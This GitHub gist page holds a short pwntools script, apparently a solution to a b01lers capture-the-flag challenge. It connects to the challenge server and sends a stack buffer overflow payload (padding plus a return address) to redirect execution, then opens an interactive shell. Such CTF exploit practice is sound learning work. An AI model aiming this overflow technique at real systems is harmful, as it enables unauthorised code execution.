Skip to content

Instantly share code, notes, and snippets.

@hkraw
Created October 4, 2020 13:54
Show Gist options
  • Save hkraw/5741e75b2e2c880d4825a287ef20b373 to your computer and use it in GitHub Desktop.
Save hkraw/5741e75b2e2c880d4825a287ef20b373 to your computer and use it in GitHub Desktop.
#!/usr/bin/python3
from pwn import *
from past.builtins import xrange
from time import sleep
import random
if __name__ == '__main__':
io = remote('chal.ctf.b01lers.com',1015)
io.sendlineafter('Thyself.\n',b'A'*0x18+p64(0x00401196))
io.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment